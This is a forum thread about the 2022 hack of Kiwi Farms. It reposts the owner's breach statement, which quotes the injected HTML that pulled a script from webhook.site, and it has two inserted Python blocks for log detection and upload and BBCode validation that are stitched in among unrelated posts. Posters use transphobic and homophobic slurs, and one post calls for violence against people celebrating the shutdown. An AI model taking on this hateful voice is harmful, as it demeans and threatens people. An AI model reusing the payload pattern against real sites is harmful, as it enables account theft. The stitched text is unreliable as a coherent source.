Those evil fucking parasites just don't know when to stop.
Site hacked, tor down and now the troon mafia is attacking any other means null has to fight back yet the fucking lemming retard masses cheer in favor of all of this, supporting the fag who wants to convince your 6 YEAR OLD SON to cut off his dick, grow tits, put on panties and dance in front of middle aged guys in speedos. I already had a negative opinion of 99% of humanity but this cements that it'll never change.
Hacked? Did they change what it says or delete threads? Do you have a screencap?
literally just go to kiwifarms.net
I highly recommend this. The little privacy advice he gives is pretty solid and should be taken seriously if you value privacy. In addition, I would also recommend checking out https://www.privacytools.io/
josh explained everything there
Did he stop using poast?
If Null hadn't proven to be an utterly useless fagaloon on Poast, I would have been willing to forgive the BS. But he simply claimed it was a handful of bad actors (Jack Awful and the like) before going "kys pedo", proving that it wasn't just "a few bad actors". His group of shit-brained slacktivists like "I hope they post CSEM" Procrastinhater can burn for all I care.
I clicked too late to see the letter. It's only an animated video when I found this post. I didn't know it ever changed from the teacup thing. Okay it looks like the clearnet domain is up rn.
Here's the text that was posted if you want it:
Site Breach
User Impact Statement
The forum was hacked. You should assume the following.
- Assume your password for the Kiwi Farms has been stolen.
- Assume your email has been leaked.
- Assume any IP you've used on your Kiwi Farms account in the last month has been leaked.
Thankfully, most users pay attention to my privacy checkups and there isn't much to leak.
You should take a moment to read privacyguides.org, even if you hate this site. Use an email address from a reputable provider. Never use the same password. Use a passphrase with a password manager suggested on PrivacyGuides. Use email aliases instead of burner emails so you keep access to your accounts without risking your privacy.
I do not know for sure if any user information was leaked. In my access logs, they attempted to download all user records at once. This caused an error and no output was returned. I shut everything off soon after. If they scraped information through some other mechanism, I cannot say with any confidence either way.
Prognosis
The site will be restored from a backup point taken on September 17th at noon GMT.
This will not happen immediately. I need to reformat and reinstall everything. I need to completely evaluate my security from the top down.
Cloudflare not only provided DDoS protection, they also accounted for many popular exploits like this. As I've worked for weeks to combat the endless flow of attacks from every conceivable angle, I have spread myself very thin and hurriedly replaced old systems with new ones that are not properly vetted.
Even now, the many groups which have organized to terrorize businesses and attack the servers are looking for new opportunities to complicate our situation.
I am very, very tired of writing statements like this, but I find it difficult to stifle my righteous indignation. Every time I see the reaction of these people, it is this hideous arrogance. I am so filled with utter revulsion at the thought of letting smug, dangerous perverts get away with hiding who they are from the public.
More than anything, I really miss spending time with you guys and laughing at stupid shit. It is very draining to deal with such miserable people all the time.
Technical Explanation
Yesterday, vsys - one of our hosts out of Ukraine - was compromised. I initially believed that this allowed a hacker to take over that webserver and snoop data as a man-in-the-middle. I no longer believe that is the case.
A bad actor was able to upload a webpage disguised as an audio file to XenForo. Elsewhere, he was able to load this webpage (probably as an inline frame), causing random users to make automated requests and send their authentication cookies off-site, so that the attacker could use it to gain access to their account. My admin account was compromised through this mechanism.
Once they had access to the ACP, they attempted to download user data, and XenForo provides a way to export user lists with information that is precisely: email, username, last activity, register date, user state (banned/unverified), post count, and if they are staff.
However, their request did not appear to go through because they requested too many records at once. The following record reports a 500 error and no content.
2a03:e600:100::31 - - [18/Sep/2022:08:16:13 +0000] "GET /admin.php?users/list-export&export=1 HTTP/2.0" 500 0 "https://kiwifarms.st/admin.php?users/list" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
It's impossible to say if they acquired user data through other means, but I did not see any other attempt to complete this transaction or otherwise scrape user data.
The file uploaded was an .opus file that contained a web document that looked like this.
<!DOCTYPE html>
<script src=//webhook.site/payload-url></script>
I do not know what was in the payload. The webhook site allows for you to redirect to other scripts and to delete request history, which was done. There's no information tied to that page.
The script caused the user to load /test-chat, my chat shim, /help/, XenForo's help documentation, /avatar/avatar, to change their avatar to the logo of another site (likely as a frame job), and admin.php?tools/phpinfo, if they were an admin.
The script was uploaded to XenForo directly (as XenForo does not validate media), but injected by my custom Rust-based chat program that interacts with XenForo and borrows sessions.
x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/xxxx/xxxx.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"
You can find relevant scripts below.
ruforo/src/bin/xf_chat/main.rs at master · jaw-sh/ruforo (github.com)
ruforo/resources/js/chat.js at master · jaw-sh/ruforo (github.com)
XenForo removed us from their license a year ago and their software is no longer sufficient for our needs. We needed something custom, but my confidence in my work has been shot.
ruforo/src/bbcode at master · jaw-sh/ruforo (github.com)
The sophistication in this attack is very high, and shows an intimate familiarity with both Rust and XenForo. It is unfortunate that they have applied themselves to this end, likely for pay.
There are so many more people trying to destroy than create.
Take it easy,
Josh
<[email protected]>
P.S. I am still expecting to have to deal with that family emergency. If that happens, I will be gone for a while. Updates will be on t.me/s/kiwifarms.
Update Sep-19: XSS Injection Found
There were two possible ways to inject an iframe into the chat HTML: one by using [code] tags, and another by malforming an opening tag, like [b<tag>]. Thank you to the three anonymous people who submitted this information.
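The statement shows two access-log lines: the failed user-list export (a 500 with zero bytes) and the fetch of the disguised .opus file from the chat page. The detection logic below is an added example, not anything from the statement or from the ruforo/XenForo code: it parses combined-format log lines and flags (a) any request to the XenForo user-list export endpoint, successful or not, and (b) a successfully served upload under /data/audio/ that is too small to be real audio. The three sample lines, the documentation IPs, the hostname forum.example and the 1024-byte threshold are all constructed assumptions.

```python
import re

# Apache/nginx combined log format, as used by the two lines in the statement.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log (NOT the real access log): three lines modelled on the
# two shown in the statement, with documentation IPs and a placeholder hostname.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Sep/2022:08:16:13 +0000] "GET /admin.php?users/list-export&export=1 HTTP/2.0" 500 0 "https://forum.example/admin.php?users/list" "Mozilla/5.0"
192.0.2.20 - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/1234/abcd.opus HTTP/1.1" 200 90 "https://forum.example/test-chat?style=dark" "Mozilla/5.0"
192.0.2.30 - - [18/Sep/2022:03:04:00 -0400] "GET /threads/hello.1/ HTTP/1.1" 200 5120 "https://forum.example/" "Mozilla/5.0"
"""

# Assumed threshold: a real Opus file (Ogg pages + OpusHead + OpusTags) is far
# larger than a few dozen bytes, so tiny "audio" responses deserve a look.
MIN_PLAUSIBLE_AUDIO_BYTES = 1024


def parse_line(line: str):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def findings(log_text: str):
    """Scan log lines and return (rule, ip, path, status, bytes) tuples worth an alert."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path, size = rec["path"], rec["size"]
        nbytes = int(size) if size.isdigit() else 0
        # Rule 1: any request to the user-list export endpoint, whether or not it
        # succeeded. A 500 with zero bytes still means someone with ACP access
        # tried to pull the whole user table.
        if path.startswith("/admin.php?users/list-export"):
            hits.append(("admin-user-export", rec["ip"], path, rec["status"], nbytes))
        # Rule 2: an uploaded "audio" file served successfully but too small to be
        # real audio, which is what an HTML document renamed to .opus looks like.
        elif (path.startswith("/data/audio/") and rec["status"] == "200"
              and nbytes < MIN_PLAUSIBLE_AUDIO_BYTES):
            hits.append(("tiny-audio-upload", rec["ip"], path, rec["status"], nbytes))
    return hits


if __name__ == "__main__":
    for hit in findings(SAMPLE_LOG):
        print(*hit)
```

Rule 1 is the one to alert on in real time: the export endpoint is only ever touched by staff doing deliberate bulk exports, so a hit outside a known maintenance window is worth a page regardless of the response code.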
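The statement names two weaknesses: media uploads were not validated, so an HTML document could be stored as an .opus file, and the chat's BBCode handling let a malformed opening tag such as [b<tag>] reach the page as markup. The code below is an added example in Python, not part of the statement and not the ruforo or XenForo code, showing one defensive check for each: a container-level test that the first Ogg page carries an OpusHead packet (enough to refuse renamed HTML, though not a decoder), and a BBCode renderer that accepts only exact, allow-listed tag names and HTML-escapes everything else, including the contents of [code] blocks. The sample bytes and the host example.invalid are constructed; the real upload and payload URL are not reproduced.

```python
import html
import re

# --- 1. Reject uploads that are not really Opus audio --------------------------
# An Ogg/Opus file starts with an Ogg page ("OggS", version 0, beginning-of-stream
# flag set) whose first packet is the 19-byte-or-longer "OpusHead" header.

def looks_like_opus(data: bytes) -> bool:
    """Container check only: is the first Ogg page a BOS page carrying OpusHead?"""
    if len(data) < 27 or data[:4] != b"OggS" or data[4] != 0:
        return False
    if not data[5] & 0x02:                      # first page must be a BOS page
        return False
    n_segs = data[26]
    table = data[27:27 + n_segs]
    if n_segs == 0 or len(table) < n_segs:
        return False
    packet_len = 0                              # first packet = lacing values up to one < 255
    for lace in table:
        packet_len += lace
        if lace < 255:
            break
    body = data[27 + n_segs:27 + n_segs + packet_len]
    return len(body) == packet_len and packet_len >= 19 and body[:8] == b"OpusHead"


# Constructed samples (not the file from the incident): a minimal valid Ogg/Opus
# BOS page, and an HTML document shaped like the one quoted in the statement.
OGG_OPUS_SAMPLE = (
    b"OggS" + b"\x00\x02" + b"\x00" * 20 + b"\x01" + b"\x13"
    + b"OpusHead\x01\x02\x38\x01\x80\xbb\x00\x00\x00\x00\x00"
)
HTML_DISGUISED_AS_OPUS = b"<!DOCTYPE html>\n<script src=//example.invalid/payload></script>\n"


# --- 2. Parse BBCode strictly so "[b<tag>]" is text, not a tag -----------------
# A tag is "[" + optional "/" + ASCII letters + "]" and nothing else; anything that
# does not match exactly is escaped as literal text.
TAG_RE = re.compile(r"\[(/?)([A-Za-z]+)\]")
HTML_FOR = {"b": "b", "i": "i", "u": "u", "quote": "blockquote"}   # allow-list


def render_bbcode(text: str) -> str:
    """Render an allow-listed BBCode subset to HTML; everything else is escaped."""
    out, pos, stack, in_code = [], 0, [], False
    for m in TAG_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        pos = m.end()
        literal = html.escape(m.group(0))
        closing, name = m.group(1) == "/", m.group(2).lower()
        if in_code:                               # inside [code] everything is literal
            if closing and name == "code":
                out.append("</pre>")
                in_code = False
            else:
                out.append(literal)
        elif name == "code" and not closing:
            out.append("<pre>")
            in_code = True
        elif name in HTML_FOR and not closing:
            out.append(f"<{HTML_FOR[name]}>")
            stack.append(name)
        elif name in HTML_FOR and stack and stack[-1] == name:
            out.append(f"</{HTML_FOR[name]}>")
            stack.pop()
        else:                                     # unknown or unbalanced: keep as text
            out.append(literal)
    out.append(html.escape(text[pos:]))
    if in_code:
        out.append("</pre>")
    while stack:                                  # close anything left open
        out.append(f"</{HTML_FOR[stack.pop()]}>")
    return "".join(out)


if __name__ == "__main__":
    print(looks_like_opus(OGG_OPUS_SAMPLE), looks_like_opus(HTML_DISGUISED_AS_OPUS))
    print(render_bbcode("[b<iframe src=x>]hi[/b]"))
    print(render_bbcode("[code]<script>[/code]"))
```

Validation on upload is only half of it: serve uploads with the Content-Type that was validated, X-Content-Type-Options: nosniff and Content-Disposition: attachment so a browser will not render a stored file as a document, and serve user uploads from a separate origin so that a file which does get rendered cannot read the forum's cookies.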
If that isn't the pot calling the kettle black, I'll eat my fucking hat. This is why Null lost my respect, letting his goddamn moronic tards get away with their BS, claiming "it was only a few bad actors" and then proceeding to prove it wasn't just "a few bad actors". The fact this shirtbird cares more about malding and seething over drawings than actual fucking kiddie diddlers told me everything I needed to know about them.
Considering the fact that they like to stir up crap everywhere, even with those who'll take them in, I wouldn't be surprised if they tried to make enemies with DDOS-guard as well. Not to take anything away from the good they do, but they simply are not the most amicable people and like to stir up drama with their allies, to say it lightly.
It's incredibly depressing to see what's happening to KF rn.
Their .ru domain even got pulled, which is absolutely insane.
DDoS-Guard dropped them last I checked. The fucking guys who'll host hamas, have dropped KFs.
This isn't the end of it (I hope), and I'm sure people will move on as they do with the 24 Hour news cycle, and hopefully KiwiFarms will regain some of their security and infrastructure. Josh has made it through before and I'm sure he'll come through again.
You can find Josh's statement here (TOR link).
Lets hope this isn't the last we hear from KF.
Even if you don't like what KF does, it's users, or what they talk about, if you don't see what a horrifying signal this is for the future of the internet you're a fucking retard.
Anyone celebrating what happened to them needs to be scalped.
There used to be a really good null thread on a kiwi farms splinter site called lolcow dot org and he was really into neko shota when he was younger apparently.
On principle. Varis is pro-freedom of speech and expression whether is controversial art like loli or unpopular opinions like those found on the kiwifarms so on that aspect most of us are not happy with the censorship of the farms.
Is varshhangout pro kiwi farms?
Well, I guess I should make my center-left political views known then. Is there a way to post a bio on my profile? I'm still relatively new.
On a personal level, it varies, some like them for standing against the mainstream ideologies.
While others, me included admittedly, dislike them for their, frankly, myopic view on anime.
If you like lolis then you should be in favor of free speech, even for people you disagree with. Otherwise you can't complain when it is you on the receiving end of censorship.
For the record, I think Kiwi Farms was a cesspool of retarded, freakish alt-right incels whose cancerous activities were nothing short of terrorism. And I highly praise Keffals for her successful campaign in shutting down their freakish site. I came here to engage with weebs, lolicons and social outcasts, not far-right cyber bullies. Hopefully those aren't the kind of people that lurk here.
I follow a logic: if they can censor someone, one day they can do that to me, even when what I say/did is still legal.